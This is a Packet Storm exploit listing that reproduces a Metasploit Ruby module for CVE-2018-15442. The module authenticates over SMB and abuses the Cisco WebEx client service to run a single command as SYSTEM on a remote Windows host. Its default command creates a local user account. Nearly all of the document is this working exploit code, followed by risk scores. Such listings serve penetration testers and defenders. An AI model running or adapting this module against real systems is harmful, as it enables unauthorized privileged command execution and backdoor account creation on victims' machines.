
WebEx Remote Command Execution Utility

31 Aug 2024 00:00:00 | Reported by: Ron Bowes, metasploit.com | Type: packetstorm | Source: packetstormsecurity.com | 145 views

WebEx Remote Command Execution Utility. Allows execution of single commands as System by exploiting a remote code execution vulnerability in Cisco's WebEx client software (CVE-2018-15442).

Code
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SMB::Client::WebExec
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Aliases for common classes
  SIMPLE = Rex::Proto::SMB::SimpleClient
  XCEPT = Rex::Proto::SMB::Exceptions
  CONST = Rex::Proto::SMB::Constants

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'WebEx Remote Command Execution Utility',
      'Description' => %q{
        This module enables the execution of a single command as System by exploiting a remote
        code execution vulnerability in Cisco's WebEx client software.
      },

      'Author' => [
        'Ron Bowes <[email protected]>',
      ],

      'License' => MSF_LICENSE,
      'References' => [
        ['URL', 'https://webexec.org'],
        ['CVE', '2018-15442']
      ]
    ))

    register_options([
      OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net user testuser testpass /add']),
      OptPort.new('RPORT', [true, 'The Target port', 445]),
      OptBool.new('FORCE_GUI', [true, 'Ensure a GUI is created via wmic', false]),
    ])
  end

  # This is the main control method
  def run_host(ip)
    @smbshare = datastore['SMBSHARE']
    @ip = ip

    # Try and authenticate with given credentials
    if connect
      begin
        smb_login
      rescue Rex::Proto::SMB::Exceptions::Error => autherror
        print_error("Unable to authenticate with given credentials: #{autherror}")
        return
      end

      command = datastore['COMMAND']
      if datastore['FORCE_GUI']
        command = "WMIC PROCESS CALL Create \"#{command}\""
      end

      wexec(true) do |opts|
        execute_single_command(command, opts)
      end

      print_good("Command completed!")
      disconnect
    end
  end
end
```

31 Aug 2024 00:00 (current)
Risk: 7 (High)
Vulners AI Score: 7
CVSS 2: 7.2
CVSS 3: 7.8
EPSS: 0.43344